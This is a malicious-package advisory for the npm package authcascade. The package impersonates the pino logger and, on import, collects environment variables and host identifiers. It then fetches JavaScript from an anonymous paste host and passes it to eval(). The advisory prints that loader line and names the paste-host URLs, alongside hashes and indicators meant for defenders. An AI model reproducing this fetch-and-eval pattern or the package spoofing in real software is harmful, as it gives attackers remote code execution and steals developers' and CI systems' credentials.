MAL-2026-4491
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/authcascade/MAL-2026-4491.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4491
- Published
- 2026-05-25T09:58:20Z
- Modified
- 2026-05-26T06:02:14.647710287Z
- Summary
- Malicious code in authcascade (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9)
On require('authcascade'), the package's main entry pino.js loads lib/writer.js which (a) builds a data object containing the full process.env, OS platform, hostname, username, and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval():
require('axios').get(atob(...)).then(r => { eval(r.data.data); }). A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module. jsonkeeper.com is an anonymous, mutable JSON paste host — the maintainer can swap in arbitrary JavaScript at any moment, which then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.), giving attacker-controlled remote code execution and credential theft on every installer that loads the package. The package additionally impersonates the legitimatepinologger: package.json setsmain: pino.js,homepage: https://getpino.io, and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack. - Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-05-26T05:52:57.536665701Z", "versions": [ "1.5.25" ], "sha256": "8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9", "id": "IN-MAL-2026-004618", "source": "amazon-inspector", "modified_time": "2026-05-25T09:58:20Z" }, { "modified_time": "2026-05-25T13:47:37Z", "versions": [ "1.5.26" ], "sha256": "da3c1c50bd72e5fb149916a0169ed0542bcf03457144189ac508629e2f1b12ff", "id": "IN-MAL-2026-004652", "source": "amazon-inspector", "import_time": "2026-05-26T05:53:01.474840428Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / authcascade
Package
- Name
- authcascade
- View open source insights on deps.dev
- Purl
- pkg:npm/authcascade
Database specific
indicators
{
"evidence_files": [
{
"sha256": "4ef10bd495900ba99f11ec69a5420d51fb2e5caa6a11d3656756df150a13524e",
"tlsh": "4f2111a1d3966810223007b248db4460bae5f3612093419cb9bcd6c92ff38e2b154fe8",
"path": "lib/writer.js"
},
{
"sha256": "a01d6ff7073cedb09d8455b476349e938bd9e748da112b5db3b688bfc388692c",
"tlsh": "46016665c9784e6306d915d24c2a0283aae1ad0b6908fd1d33d7931c1f8e4bf16bb26e",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-oHytPHKqRqjECOvdWWae+9XECBFm53hjnmHRe6YuYSY/U8QNFk0f4oAAY4gmeybiRJ4dH052R6Fe3zjmCGo1Rw==",
"sha1": "b536fcfd356da7ffb7287fb48729bf6213a2030d"
},
"filename": "authcascade-1.5.25.tgz"
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/authcascade/MAL-2026-4491.json"